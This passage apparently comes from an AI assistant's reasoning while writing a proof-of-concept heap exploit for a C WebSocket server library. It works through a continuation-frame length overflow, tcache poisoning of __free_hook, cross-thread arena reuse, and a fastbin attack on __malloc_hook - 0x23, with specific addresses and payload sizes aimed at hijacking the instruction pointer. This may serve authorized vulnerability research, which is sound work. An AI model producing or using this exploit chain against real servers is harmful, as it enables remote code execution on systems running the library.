But wait - there's a subtlety. The response variable in ws_sendframe_internal points to the address returned by malloc, which is &__free_hook. So free(response) = free(&__free_hook). And __free_hook is called with &__free_hook as argument. But by this time, __free_hook's VALUE has been overwritten by the frame header + content.

So: __free_hook(&__free_hook) where __free_hook = 0x??????????2082 (for 32-byte payload). RIP will be 0x??????????2082. This proves control.

But we CAN do better. If we use a payload size where the frame header doesn't corrupt the address too badly, or if we find a way to write a clean address...

Actually, the frame header is always 2 bytes (for length <= 125). So bytes 0-1 of __free_hook are always corrupted by the frame header. We can't avoid this for response sizes that use a 2-byte header.

But for the PoC, 0x??????????2082 is already RIP control! We just need to show the crash.

Wait, actually I should reconsider. The echo writes response content to response, which is &__free_hook. But response is a pointer to unsigned char. So:

  • response[0] = frame[0] = 0x82 → byte at &__free_hook
  • response[1] = frame[1] = length → byte at &__free_hook + 1
  • response[2..2+length-1] = msg[0..length-1] → bytes at &__free_hook + 2 onwards

On x86_64 little-endian, __free_hook is an 8-byte function pointer. The value is loaded as:

  • byte 0 (LSB) = 0x82
  • byte 1 = length (e.g., 0x20 for 32)
  • bytes 2-7 = msg[0..5]

So __free_hook = msg[5]<<56 | msg[4]<<48 | msg[3]<<40 | msg[2]<<32 | msg[1]<<24 | msg[0]<<16 | 0x2082

We control bytes 2-7 (msg[0..5]). For system at 0x7ffff7e01290, we'd need:

  • byte 0 = 0x90 → but frame header forces 0x82. Not possible directly.

So we can't cleanly set __free_hook to system(). But for the PoC, we just need to prove RIP control. We can set msg[0..5] to something recognizable like \x41\x41\x41\x41\x41\x41 and show RIP = 0x4141414141412082.

Actually wait, I realize we should think about this more carefully. The critical path is:

After corrupting tcache[1] so that B.fd = &__free_hook:

  1. Connection 2 handshake: base64_encode → malloc(31) → gets... hmm, which chunk?

Actually, the tcache[1] state after the overflow on connection 1 depends on what exactly we overwrite. Let me reconsider.

After shaping and before exploit:

  • tcache[1] = {B} (count=1)
  • Exploit frame 1: malloc(32) → gets A from tcache[1]. Wait, no. After shaping msg 2 frees, tcache[1] has {A, B, ...}. Let me re-trace.

OK, I think the cleanest approach is:

Pre-conditions:

  • After shaping, tcache[1] has at least 2 entries, with A (from top) and B (adjacent, from top) being the last two added.

Exploit:

  1. malloc(32) for exploit frame 1 → gets the most recently freed chunk (let's call it A). tcache[1] now has B at head.
  2. A is our exploit buffer. B is physically adjacent at A+48, free in tcache[1].
  3. Overflow from A writes into B, overwriting B's fd with &__free_hook.
  4. tcache[1] now: B → __free_hook (count=1)

Wait, but tcache counts. When we popped A, count went from 2 to 1. B is still in tcache with count=1. After corrupting B's fd: tcache[1] = {B → __free_hook}, count=1.

  5. Connection 1 close → free(msg_data) frees A → tcache[1] = {A → B → __free_hook}, count=2.

Wait, but A was the overflow buffer. After the overflow, the server hit the error path and called free(fsd.msg_data) at line 1713. That frees A. But A is still "valid" (it was allocated). So free(A) → tcache[1] = {A → B → __free_hook}, count=2.

Hmm, but after the overflow, next_byte() returns -1 (socket EOF), so read_single_frame returns -1, the loop breaks, and free(fsd.msg_data) is called at line 1713. That's free(A). Then the error propagates up, onclose is called, and the thread exits.

So after connection 1 closes:

  • tcache[1] = {A → B → __free_hook}, count=2

But B's fd is corrupted. When the next malloc(31) pops A, tcache[1] = {B → __free_hook}, count=1. Then the next malloc(31) pops B, tcache[1] = {__free_hook}, count=0.

But wait, in the connection 2 handshake, base64_encode does malloc(31) which gets A. Then free(accept) = free(A) puts A back: tcache[1] = {A → __free_hook}, count=1.

Then in the connection 2 echo path:

  • msg: malloc(32) → gets A from tcache[1]. tcache[1] = {__free_hook}, count=0.
  • echo: malloc(35) → gets __free_hook!!! Writes frame data there.
  • free(response) → response = __free_hook pointer. Since __free_hook was overwritten, __free_hook(response) is called → RIP control!

Wait, but there's a problem. The free(response) is called in ws_sendframe_internal. At that point, __free_hook has been overwritten by the echo's malloc returning its address and the subsequent write. But __free_hook was 0 (NULL) before. After the echo writes to it, it becomes the frame header + msg content.

Actually wait, free(response) is called at line 687. By this point, response points to __free_hook's memory location. The content of __free_hook has been overwritten. So when free(response) is called:

  1. glibc's free() checks __free_hook
  2. __free_hook is now 0x??????????2082 (not NULL)
  3. free() calls __free_hook(response) = 0x??????????2082(&__free_hook)
  4. This crashes because 0x??????????2082 is not a valid function address

SIGSEGV! RIP = 0x??????????2082. RIP control proven!

Now, for an even better demo, we could try to set __free_hook to system() or exit() for a cleaner crash. But the frame header corrupts the low 2 bytes. So we'd need:

  • For system = 0x7ffff7e01290: we'd need byte 0 = 0x90, but it's forced to 0x82. Can't do it.
  • Unless we use a different message length that happens to produce a useful value.

Actually, for the PoC, just crashing at a controlled address is enough. We can set msg[0..5] to recognizable bytes and demonstrate RIP = that value.

But actually, there might be a way to write a clean value. What if we use a message that triggers a 10-byte frame header (for 64-bit length)? Then the frame header is 10 bytes, overwriting all 8 bytes of __free_hook.

For a length >= 65536: idx_first_rData = 10, so response = malloc(10 + length + 1). For this to be a 48-byte chunk: request2size(10 + length + 1) = 48, so 10 + length + 1 must be 25-40, meaning length = 14-29. But length must be >= 65536 for 10-byte header. Contradiction!

So 10-byte header isn't possible for 48-byte chunks. The 2-byte header is what we get.

We could also consider a message with 4-byte header (16-bit length, 126-65535): idx_first_rData = 4, so malloc(4 + length + 1). For 48-byte chunk: length + 5 in 25-40, so length = 20-35. But length must be 126-65535 for 4-byte header. Contradiction again.

So with 48-byte chunks, we always get a 2-byte header that corrupts the low 2 bytes of __free_hook.

For the PoC, this is fine. Let me plan the implementation.

Now let me also think about whether free(msg_data) on connection 1's error path will cause issues. After the overflow, msg_data = A (the exploit buffer). The overflow wrote past A, corrupting B's metadata. When free(A) is called:

  • A's chunk metadata (at A-16) should still be intact (we only wrote past A+32, which is past A's 48-byte boundary... wait, let me check).

Actually, A is a 48-byte chunk. User data starts at A (which is chunk+16). User data is 32 bytes (48 - 16). The overflow starts at msg[f1sz] where f1sz=32. So the overflow starts right at the boundary of A's user data! The first byte of the overflow goes into the next chunk's prev_size.

So A's own chunk metadata (prev_size and size at A-16) is untouched. Only the adjacent chunks are corrupted. free(A) should work fine because:

  1. tcache checks: tc_idx = 1, tcache->counts[1] < 7, so tcache_put(A) succeeds.
  2. No integrity checks on the freed chunk itself in tcache_put.

Good. So the plan is solid.

Let me also think about whether the free(msg_data) at line 1713 actually happens before or after the tcache is poisoned. The sequence is:

  1. Frame 1: malloc(32) → A. Write 32 bytes to A[0..31]. All good.
  2. Frame 2: overflow. Write starts at A[32], goes into B. Corrupts B's fd.
  3. next_byte() returns -1 (EOF from our closed socket).
  4. read_single_frame returns -1.
  5. Loop breaks.
  6. free(fsd.msg_data) = free(A) → A goes to tcache[1].
  7. Error propagates, onclose called, thread exits.

After step 6: tcache[1] = {A → B → __free_hook} (A was pushed to head, B was already there with corrupted fd, count goes to 2).

Wait, actually tcache[1] before step 6 was: {B → __free_hook}, count=1. After free(A): tcache[1] = {A → B → __free_hook}, count=2.

But does tcache_put(A) check A's fd? No, it just sets A->next = tcache->entries[1], then tcache->entries[1] = A. So A->next = B. And B->next was corrupted to __free_hook.

So the chain is: A → B → __free_hook. Correct!

Now for connection 2:

  • Handshake: malloc(31) → gets A from tcache[1]. count=1. tcache[1] = {B → __free_hook}
  • Handshake continues...
  • free(accept) = free(A) → tcache_put. count=2. tcache[1] = {A → B → __free_hook}

Now send a message on connection 2:

  • msg: malloc(32) → gets A from tcache[1]. count=1. tcache[1] = {B → __free_hook}
  • echo response: malloc(35) → gets B from tcache[1]. count=0. tcache[1] = {__free_hook}

Hmm wait, that's wrong. After getting B, tcache[1] should be {__free_hook}, count=0. But actually, count was 1 when we popped B, so it goes to 0. And the head becomes B->next = __free_hook.

Actually, tcache works like this:

```c
// tcache_get
tcache->entries[tc_idx] = e->next;  // head = B->next = __free_hook
--(tcache->counts[tc_idx]);  // count = 0
return e;  // returns B
```
So after getting B: tcache[1] = {__free_hook}, count=0. But the entry IS __free_hook, and count is 0. Can we still get it?

In glibc 2.31, tcache_get checks tc_idx < mp_.tcache_bins && tcache && tcache->entries[tc_idx] != NULL. It does NOT check counts! So even with count=0, if entries[tc_idx] is non-NULL, it will be returned.

Wait, actually I need to double-check. Let me look at the glibc 2.31 source:

```c
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > (void *) 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  e->key = NULL;
  return (void *) e;
}
```

And in __libc_malloc:

```c
if (tc_idx < mp_.tcache_bins
    /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
    && tcache
    && tcache->entries[tc_idx] != NULL)
  {
    return tcache_get (tc_idx);
  }
```

Yes! It only checks entries[tc_idx] != NULL, not counts. So even with count=0, if the entry pointer is non-NULL, it's returned. The count becomes -1 (underflow), but that's fine for exploitation.

So after getting B for the echo response:

  • tcache[1] = {__free_hook}, count=0 (will underflow to -1 on next get, but unsigned... it'll be a very large number. Doesn't matter.)

Then, the echo response writes to B. B is a legitimate chunk, so that's fine. Then free(response) = free(B). This goes to tcache_put. tcache[1] = {B → __free_hook}, count=1.

Wait, but free(B) checks tcache->counts[tc_idx] < mp_.tcache_count (which is 7 by default). Count is 0, which is < 7, so tcache_put succeeds. tcache[1] = {B → __free_hook}, count=1.

Hmm, but we've made no progress. We got B back, not __free_hook.

I think the issue is that connection 2's echo is the FIRST malloc on that thread's connection. But connection 2 has its OWN thread, which means... does each thread have its own tcache?

On glibc 2.31, tcache is per-thread! Each thread has its own tcache_perthread_struct. So connection 2's thread has an EMPTY tcache[1]!

This is a critical issue. The tcache we poisoned is connection 1's thread tcache. Connection 2 runs in a different thread with its own tcache.

Wait, but is this actually true? Let me reconsider. The wsServer creates a new thread per connection (ws_establishconnection runs in a thread). So connection 1 and connection 2 are in different threads, each with their own tcache.

So tcache poisoning from connection 1's thread does NOT affect connection 2's thread's tcache. This is a major problem.

But wait, the chunks we freed are in the ARENA, not just tcache. When tcache is full (7 entries), further frees go to the arena's fastbins. But we're dealing with tcache, not fastbins.

Hmm, but there's only one main arena (well, one arena per thread, but they share the same heap). Actually, on glibc 2.31, threads can have their own arenas, and tcache is per-thread.

But our GDB run showed the chunk had the NON_MAIN_ARENA flag set, meaning it's in a thread arena. Each arena has its own locks and chunk management.

So the tcache poisoning approach has a fundamental problem: we're poisoning connection 1's thread tcache, but we need connection 2's thread to hit it.

Wait, let me reconsider. Are there ways around this?

  1. Same connection: Instead of two connections, do everything on one connection. After the overflow, we need the SAME thread to do another malloc of the right size.

But on connection 1, after the overflow, the server hits the error path and calls free(msg_data), then onclose, then the thread exits. No more mallocs.

Unless... we can make the server NOT error out after the overflow. But the overflow triggers because next_byte() returns -1 (we close the socket). If we DON'T close the socket, the write loop keeps going (writing our overflow data). After the write loop, the frame is complete (FIN=1), and next_complete_frame returns with the message. Then onmessage is called, which does ws_sendframe_bcast → malloc(response). That malloc would be on the SAME thread!

Wait, this is a much better approach! Let me re-read the write loop:

```c
for (i = 0; i < fsd->frame_length; i++, (*msg_idx)++)
{
    cur_byte = next_byte(wfd);
    if (cur_byte == -1)
        return (-1);
    msg[*msg_idx] = cur_byte ^ masks[i % 4];
}
```

The write loop reads one byte at a time via next_byte(). It writes fsd->frame_length bytes (which is huge, ~2^64). After writing our overflow bytes, it needs MORE bytes from the socket. If we close the socket, next_byte() returns -1, and the loop exits.

But what if we send exactly the right number of overflow bytes and then... we can't send 2^64 bytes. The loop will always hit EOF.

Unless we change the approach. What if we make the overflow length smaller? Instead of 2^64-11, what if we use a length that wraps to a small value but the actual overflow is just a few dozen bytes?

The current setup:

  • Frame 1: non-FIN, f1sz bytes
  • Frame 2: FIN continuation, length = 5 - f1sz (mod 2^64)
  • frame_size = f1sz + length = 5 (mod 2^64) → passes check
  • realloc(msg, f1sz + length + 1) = realloc(msg, 6) → tiny, same pointer
  • Write loop writes length bytes starting at msg[f1sz]

But length = 5 - f1sz = 5 - 16 = 0xFFFFFFFFFFFFFFF5 for f1sz=16. That's way too many bytes.

What if f1sz = 4 and length = 1? Then frame_size = 5, realloc(msg, 6), write loop writes 1 byte. No overflow.

The problem is that to overflow, we need length to be huge (wrapping around). And the write loop tries to read length bytes, which will always hit EOF.

So on a single connection, after the overflow, the server always errors out. The thread exits. No more mallocs on that thread.

OK so we're back to the cross-thread problem. Let me think about alternatives:

Alternative 1: Use the main arena's fastbins instead of tcache

Fastbins are per-arena, not per-thread: threads that share an arena share its fastbins, while a thread with its own arena has its own set.

Hmm, but on glibc 2.31, the first thread uses the main arena. Additional threads may use the main arena too (if it's not locked) or get their own arena.

Actually, the NON_MAIN_ARENA flag we saw suggests the chunk was in a thread arena. But if multiple connections share the same arena, then the fastbins are shared.

Let me think about this differently. In practice, for the PoC:

  • Connection 1 runs in thread T1
  • Connection 2 runs in thread T2
  • If T1 and T2 use the SAME arena, then the tcache poisoning doesn't help (different tcache), BUT fastbin poisoning COULD help (shared fastbins)

But actually, tcache takes priority over fastbins. When we free a chunk, it goes to the current thread's tcache first. When we malloc, the current thread's tcache is checked first. So even if the chunk is in a shared arena, the per-thread tcache intercepts it.

This means that for tcache poisoning to work cross-thread, we'd need to corrupt the other thread's tcache. But the other thread's tcache struct is in a different heap allocation.

Wait, what if we can overflow into ANOTHER thread's tcache_perthread_struct? That seems very unlikely with our fixed overflow pattern.

Alternative 2: Make the write loop succeed

What if instead of having the write loop hit EOF, we make it succeed by providing enough data? The frame length is huge, but next_byte() reads from a 2048-byte buffer. If we fill the buffer, the loop writes 2048 bytes, then next_byte() tries to read more from the socket.

But fsd->frame_length is ~2^64. We can't send that many bytes. The loop will hit EOF.

Unless... we modify the approach so that the write loop only overwrites a small number of bytes.

Wait, what about a different exploitation path? Instead of using the continuation frame integer overflow, what if we look at the error path more carefully?

Actually, let me reconsider the approach. What if we DON'T close connection 1 after the overflow? Instead:

  1. Overflow corrupts adjacent chunk's fd
  2. next_byte() returns -1 → read_single_frame returns -1
  3. free(fsd.msg_data) at line 1713 → frees A → tcache[1] = {A → B_corrupted → __free_hook}
  4. Error propagates to next_complete_frame, returns -1
  5. ws_establishconnection calls onclose, then closes the connection
  6. Thread T1 exits

All of this is on T1's thread. The poisoned tcache is T1's tcache. T1 exits, and its tcache is gone.

Hmm, but is the tcache_perthread_struct freed when the thread exits? Let me think... The tcache_perthread_struct is allocated via malloc() on thread creation (in __libc_malloc's tcache initialization). When the thread exits, the struct is NOT freed - it remains in the heap. But subsequent threads will create their OWN tcache structs.

So even though the poisoned chunks are in the heap, the new thread's tcache is fresh and won't see them.

Alternative 3: Use fastbins instead of tcache

If we fill up the tcache (7 entries) for the target bin, subsequent frees go to fastbins. Fastbins are part of the arena, not per-thread. If T1 and T2 share the same arena, then fastbin poisoning would work cross-thread.

But do T1 and T2 share the same arena? On glibc 2.31, by default, the main thread uses the main arena. Other threads may use the main arena or create their own. The number of arenas is limited (mp_.arena_max). For a simple program like our echo server with only 2 concurrent threads, they likely share the same arena.

But we saw the NON_MAIN_ARENA flag. This means the chunk was NOT in the main arena. So T1 used a non-main arena. If T2 also uses the same non-main arena, they share fastbins.

Hmm, this is getting very complex. Let me reconsider.

Actually, wait. Let me re-examine the GDB output from the previous session. The summary says:

  • Chunk at 0x7ffff0000c60, size 0x25 (32 | PREV_INUSE | NON_MAIN_ARENA)
  • NON_MAIN_ARENA flag set

The address 0x7ffff0000c60 is in the mmap region (high address), which is where thread arenas are allocated. So yes, it's in a thread arena.

But actually, looking more carefully: thread arenas on glibc 2.31 are created via mmap(), and each arena has its own heap segment. The arena pointer is stored in the thread-local thread_arena variable.

For our exploit, the question is: does connection 2's thread use the same arena as connection 1's thread?

Connection 1's thread exits before connection 2's thread starts. When a thread exits, its arena may be reused by a new thread. Specifically, on glibc 2.31, freed arenas are placed on a free list and reused.

So it's very likely that connection 2's thread reuses connection 1's arena! This means they share the same fastbins.

But we still have the tcache problem: connection 2 has a fresh tcache.

Alternative 4: Fill tcache + use fastbins

The plan:

  1. On connection 1, fill tcache[1] to capacity (7 entries)
  2. Further frees of 48-byte chunks go to the arena's fastbin for size 48
  3. Shape the heap so a free fastbin chunk is adjacent to our exploit buffer
  4. Overflow corrupts the fastbin chunk's fd
  5. Connection 1 exits, connection 2 starts
  6. Connection 2 reuses the same arena
  7. Connection 2's mallocs first drain its own tcache (empty), then check fastbins
  8. The corrupted fastbin entry gives us an arbitrary write

This is more complex but feasible. Let me think about the details.

Actually, there's an even simpler approach.

Alternative 5: Same thread, use the echo on a different connection

The echo server uses ws_sendframe_bcast, which broadcasts to ALL connections on port 8080. This means if we have connection 1 and connection 2 both open, a message on connection 1 triggers a broadcast to ALL connections. But the malloc(response) and free(response) in ws_sendframe_internal happen on connection 1's thread.

What if we reverse the order? Connection 2 sends a legitimate message. The malloc(msg) happens on connection 2's thread. Then onmessage → ws_sendframe_bcast → malloc(response) on connection 2's thread. The broadcast sends to connection 1 (among others), but the malloc/free of the response buffer is on connection 2's thread.

Hmm, this doesn't help with cross-thread tcache.

Alternative 6: Single connection, use the echo path

Wait, I just realized something. The overflow happens during read_single_frame, which is called from next_complete_frame. The error path at line 1713 frees fsd.msg_data. But BEFORE the error path, the write loop returns -1 when next_byte() fails.

What if instead of having the write loop fail, we provide EXACTLY the overflow bytes we need and then close the connection? The write loop will write our overflow data and then fail on the next next_byte(). The key question is: how many bytes does the write loop write before failing?

The write loop iterates fsd->frame_length times. For f1sz=16, frame_length = 0xFFFFFFFFFFFFFFF5. The loop needs to read 0xFFFFFFFFFFFFFFF5 bytes from the socket. We provide some overflow bytes (say 48), then close. The loop writes 48 bytes of our data, then hits EOF.

Actually, wait. The write loop reads from the socket via next_byte(), which buffers up to 2048 bytes at a time. If we sent all our data in one TCP segment, next_byte() would first buffer up to 2048 bytes, then serve them one by one. After consuming the buffer, the next next_byte() call tries to recv() from the socket. If we closed the socket, recv() returns 0 (EOF) or -1 (error), and next_byte() returns -1.

So the write loop writes as many bytes as we send, then fails. The overflow is exactly the number of extra bytes we send (minus the frame 1 data that goes into the legitimate buffer space).

But the problem remains: after the loop fails, the function returns -1, free(msg_data) is called, and the thread exits. No more mallocs on this thread.

Unless... what if there's a way to make the server survive the error and continue processing?

Looking at the code:

```c
// Line 1710-1716
if (wfd->error)
{
    free(fsd.msg_data);
    wfd->msg = NULL;
    return (-1);
}
```

The error flag is set and the function returns -1. Back in ws_establishconnection:

```c
while (next_complete_frame(&wfd) >= 0)
{
    // process message
    free(wfd.msg);
}
// onclose, cleanup...
```

The while loop exits. No more processing. Thread exits.

Alternative 7: Overflow into the tcache_perthread_struct itself

What if we can overwrite the tcache_perthread_struct of the current thread? This struct is allocated at thread creation time and contains the counts and entry pointers for all tcache bins.

If we can locate the tcache_perthread_struct relative to our overflow buffer, we can directly modify tcache entries. This would let us set any tcache bin's entry pointer to __free_hook, and the NEXT malloc on that thread would return it.

But wait, the tcache_perthread_struct for thread T1 is allocated during the first malloc in T1. The first malloc in T1 happens during the handshake (the calloc(61) in get_handshake_accept). So the tcache struct is allocated early, possibly far from our exploit buffer.

Actually, on glibc 2.31, the tcache_perthread_struct is allocated with malloc(sizeof(tcache_perthread_struct)). The size is: TCACHE_MAX_BINS * sizeof(uint16_t) + TCACHE_MAX_BINS * sizeof(tcache_entry *) — the counts array was widened from char to uint16_t in glibc 2.30. For 64 bins: 64 * 2 + 64 * 8 = 640 bytes. So malloc(640) → chunk size 0x290.

This is a large allocation that would be placed at the start of the thread arena's heap. Our exploit buffer comes later. So we'd need to overflow BACKWARDS, which we can't do.

Or... can we? Our overflow goes forward from the exploit buffer. If the tcache struct is before our buffer in memory, we can't reach it.

Actually, the tcache struct is the FIRST allocation in a new thread arena. It's allocated at the start of the heap segment. Our exploit buffer comes much later. So no, we can't overflow into it.

Alternative 8: Use the arena's bins directly (non-tcache path)

On glibc 2.31, the allocation path is:

  1. Check tcache
  2. Check fastbin
  3. Check small/large bin
  4. Check unsorted bin
  5. Split from top

The free path is:

  1. Check tcache (if not full, put in tcache and return)
  2. Check fastbin (if small enough, put in fastbin)
  3. Consolidate and put in unsorted bin

For cross-thread exploitation:

  • Each thread has its own tcache
  • Fastbins are per-arena
  • If threads share the same arena, fastbins are shared

So if we can:

  1. Fill connection 1's tcache[1] to capacity (7 entries)
  2. Free an 8th 48-byte chunk → goes to fastbin (arena-level)
  3. Overflow corrupts this fastbin chunk's fd
  4. Connection 2 reuses the same arena
  5. Connection 2's tcache[1] is empty, so it checks fastbin → finds our corrupted entry

This would work! But we need to be more careful with fastbin poisoning because glibc 2.31's fastbin allocator checks the size field:

```c
size_t victim_idx = fastbin_index (chunksize (victim));
if (__builtin_expect (victim_idx != idx, 0))
    malloc_printerr ("malloc(): memory corruption (fast)");
```

So the target address (where fd points) must have a valid size field at offset +8 that matches the fastbin index. __free_hook is in libc's .bss, which is likely zeroed. A zero size yields an out-of-range fastbin index (the unsigned macro underflows to 0xfffffffe), so we can't directly target __free_hook via fastbin.

But we can use the double-free technique or the fastbin -> smallbin technique. Or we could target a location where we can control the size field.

Actually, on glibc 2.31 with no protections (no PIE, no ASLR, no RELRO), we could target a location in the binary's .bss where we can control the size field. Or we could use the __malloc_hook approach (but __malloc_hook doesn't have a size check issue because it's checked differently).

Wait, actually __malloc_hook was deprecated in glibc 2.34, so on 2.31 it's still available. And __malloc_hook is checked in __libc_malloc BEFORE tcache, fastbin, etc. So even if the allocation path goes through tcache/fastbin, __malloc_hook is called first.

Hmm, but __malloc_hook is called at the START of malloc, not when returning a specific chunk. So we can't use __malloc_hook directly for arbitrary write. We'd still need to redirect the allocation to __free_hook memory, then free() would trigger the hook.

Actually, __malloc_hook is called like this:

```c
void *(*hook) (size_t, const void *) = atomic_forced_read (__malloc_hook);
if (__builtin_expect (hook != NULL, 0))
{
    (*hook)(bytes, RETURN_ADDRESS (0));
    ...
}
```

So if we could set __malloc_hook to system, then malloc would call system(size). But we can't set __malloc_hook directly without an arbitrary write primitive.

OK, I think the cleanest approach for the PoC is:

Use fastbins with a fake chunk at a known address.

Here's the plan:

  1. On connection 1, fill tcache[1] with 7 entries (48-byte chunks)
  2. Shape the heap so a free fastbin chunk is adjacent to the exploit buffer
  3. Overflow corrupts the fastbin chunk's fd to point to a location with a fake size of 0x30 (48 bytes)
  4. On connection 1's thread, the error path calls free(msg_data) → this goes to tcache (still room? Let me check)

Hmm, if tcache already has 7 entries, free(msg_data) would go to fastbin instead of tcache. But msg_data is the exploit buffer itself, not the adjacent corrupted chunk. The corrupted adjacent chunk is already in the fastbin (we freed it before the overflow).

Wait, let me reconsider. The flow would be:

  1. Shape: allocate and free 48-byte chunks to fill tcache[1] (7 entries)
  2. The 8th free goes to fastbin
  3. Then... we need the exploit buffer adjacent to the fastbin chunk

This is getting complicated. Let me step back and think about the SIMPLEST possible approach.

Simplest approach: Use __free_hook write on the SAME thread.

Can we somehow get a malloc on the same thread AFTER the overflow?

Looking at the code flow after the overflow:

  1. Write loop fails → read_single_frame returns -1
  2. next_complete_frame: free(fsd.msg_data) → error, returns -1
  3. ws_establishconnection: while loop exits, calls onclose
  4. onclose in echo.c: ws_getaddress(client) → returns static buffer, no malloc
  5. close_client → closes socket, no malloc
  6. Thread exits

No mallocs after the overflow on the same thread.

What about BEFORE the error? After frame 1 (non-FIN) completes successfully, the do-while loop continues to frame 2 (the exploit frame). Between frames, there's no malloc.

What about control frames? Could we interleave a PING frame between frame 1 and frame 2? Since frame 1 is non-FIN, only CONT or control frames are accepted next — and PING is a control frame, so this deserves a closer look.

Hmm, what about using the handle_ping_frame function? When a PING is received, the server responds. Let's look at that:

Actually, the server's response to a PING uses ws_sendframe → ws_sendframe_internal → malloc/free. But PINGs are control frames, and they're handled within the same next_complete_frame call. So if we send: [frame1 non-FIN] [PING] [frame2 FIN overflow], the server would:

  1. Process frame 1: allocate msg, write data
  2. Process PING: allocate response, send PONG, free response
  3. Process frame 2: overflow

The PONG response allocation happens between frame 1 and frame 2! But it's on the same thread, same tcache. The PONG response is a small allocation (depending on PING payload size), and it's freed before frame 2 starts.

This doesn't directly help with tcache poisoning, but it's an interesting allocation point.

Actually, let me reconsider the whole approach. Maybe instead of tcache poisoning, we should use a different technique.

Unsorted bin attack: Write a fake unsorted bin chunk whose bk pointer targets a location. When malloc processes the unsorted bin, it writes to bk->fd. This can corrupt arbitrary memory.

But this requires more complex heap shaping and understanding of bin management.

Alternative: Just use the crash itself as the PoC

For a security PoC, we don't necessarily need RIP control. We just need to demonstrate the heap corruption and show it's exploitable. But the user specifically asked for RIP control.

Let me reconsider the cross-thread approach more carefully.

Key question: Do connection 1 and connection 2's threads share the same arena?

On glibc 2.31, the arena allocation logic:

  1. Main thread uses main_arena (static)
  2. New threads call arena_get() which tries to reuse an existing arena or create a new one
  3. When a thread exits, its arena is placed on a free list
  4. New threads can pick up arenas from the free list

In our case:

  1. The echo server's main thread runs the accept loop
  2. Connection 1 spawns thread T1, which gets arena A1 (possibly a newly created arena)
  3. T1 exits
  4. Connection 2 spawns thread T2, which should reuse arena A1 (from the free list)

So T2 should reuse A1! This means they share fastbins (but not tcache).

OK, let me plan the fastbin approach.

Fastbin poisoning plan:

  1. Connection 1: Fill tcache + put chunk in fastbin

    • Send many shaping messages to fill tcache[1] (48-byte chunks, tcache capacity = 7)
    • After tcache is full, the next free of a 48-byte chunk goes to the arena's fastbin for 48-byte chunks
    • Shape the heap so the fastbin chunk is physically adjacent to the exploit buffer
  2. Connection 1: Overflow

    • Frame 1: allocate exploit buffer (48-byte chunk)
    • Frame 2: overflow into adjacent fastbin chunk, corrupt its fd
    • The corrupted fd should point to a location with a valid 0x30 size field at offset +8
  3. Connection 1: Thread exits

    • free(msg_data) → goes to tcache (if not full) or fastbin
    • Thread exits, arena goes to free list
  4. Connection 2: Trigger

    • Connection 2 starts, reuses arena A1
    • Connection 2 has fresh tcache, so first check is tcache (empty for 48-byte bin)
    • Falls through to fastbin → pops corrupted chunk
    • Next fastbin entry is our corrupted fd → malloc returns it
    • Write controlled data to the target address
  5. But fastbin size check: The corrupted fd target must have *(target+8) == 0x30 (for 48-byte fastbin). Where can we find this?

On glibc 2.31 with no protections:

  • __free_hook is at a known address. __free_hook + 8 is... whatever is after __free_hook in memory.
  • Actually, __free_hook is a single void (*volatile __free_hook)(void *, const void *) variable, 8 bytes. The next variable in .bss might have any value.

Hmm, we need a location where:

  1. It's at a known, fixed address (no ASLR)
  2. The value at offset +8 from that address is 0x30 (or 0x31 with flags)

One common trick: use the __malloc_hook area. On glibc 2.31, __malloc_hook - 0x10 + 0x8 = __malloc_hook - 0x8. If we can find what's at __malloc_hook - 8, and if it happens to be 0x30... unlikely.

Another trick: use __free_hook - 8 as the fake chunk start. Then *(__free_hook - 8 + 8) = *__free_hook = 0 (initially NULL). 0 is not 0x30. Doesn't work.

Actually, on glibc 2.31, the common trick for fastbin-to-__free_hook is:

  • Use __free_hook - 0x10 as the fake chunk address
  • The "size" field is at __free_hook - 0x10 + 8 = __free_hook - 8
  • What's at __free_hook - 8? It depends on the binary layout

Let me check: __free_hook = 0x7ffff7f9de48. So __free_hook - 8 = 0x7ffff7f9de40. What's there? We'd need to check in GDB. It could be part of another variable or padding.

Actually, in glibc 2.31, there's a well-known trick: the value at __free_hook - 8 is typically 0x0 or some other value that doesn't match 0x30. But there's another technique: overwrite __malloc_hook instead.

For __malloc_hook:

  • __malloc_hook = 0x7ffff7f9bb70 (from our GDB output)
  • __malloc_hook - 8 = 0x7ffff7f9bb68
  • What's at that address? Possibly 0.

Hmm, neither works directly. We'd need to find a "magic" address where offset +8 contains 0x30.

But wait, there's a classic technique: the 0x7f trick. On glibc 2.31, if we look near __malloc_hook, there's often a 0x7f byte sequence that can serve as a fake size. Specifically, __malloc_hook is preceded by the _IO_wide_data_2 vtable pointer or similar, and the alignment gives us a size of 0x7f.

Let me check: __malloc_hook = 0x7ffff7f9bb70. Let's look at 0x7ffff7f9bb70 - 0x8 = 0x7ffff7f9bb68 and nearby. On many glibc 2.31 builds, the region before __malloc_hook contains a value like 0x00000000000000ff or similar. We'd need to check.

Actually, the well-known address for this trick is __malloc_hook - 0x23:

  • Fake chunk start: __malloc_hook - 0x23
  • Size field at: __malloc_hook - 0x23 + 0x8 = __malloc_hook - 0x1b
  • On glibc 2.31 x86_64, the qword read at __malloc_hook - 0x1b (spanning bytes up to __malloc_hook - 0x14) is 0x000000000000007f (the 0x7f comes from misaligned pointer/padding bytes nearby)

This is the classic __malloc_hook - 0x23 fastbin attack. The fake chunk size is 0x7f; chunksize() masks that down to 0x78, giving fastbin index 5 — the same index as a 0x70 chunk.

So the plan changes:

  1. Use 0x70-size chunks (malloc(0x60) → chunk size 0x70)
  2. Fill tcache for the 0x70 bin
  3. Put a free 0x70 chunk in fastbin adjacent to our exploit buffer
  4. Overflow corrupts its fd to __malloc_hook - 0x23
  5. Connection 2 reuses arena, malloc(0x60) returns __malloc_hook - 0x23
  6. We write system or another function address over __malloc_hook
  7. Next malloc triggers __malloc_hook → RIP control

But wait, our exploit buffer size is determined by frame 1's payload. To make it a 0x70 chunk, frame 1's payload must fall in the range where request2size(X) = 0x70: that's 89 to 104 bytes (0x59 to 0x68). Let me verify: request2size(97) = (97 + 8 + 15) & ~15 = 120 & ~15 = 112 = 0x70. Yes, a frame 1 payload of 89-104 bytes gives a 0x70 chunk.

Then the echo response for a 97-byte message: malloc(2 + 97 + 1) = malloc(100) → request2size(100) = (100+8+15) & ~15 = 123 & ~15 = 112 = 0x70. Same bin!

OK, this is getting complex but feasible. Let me think about whether there's a simpler approach.

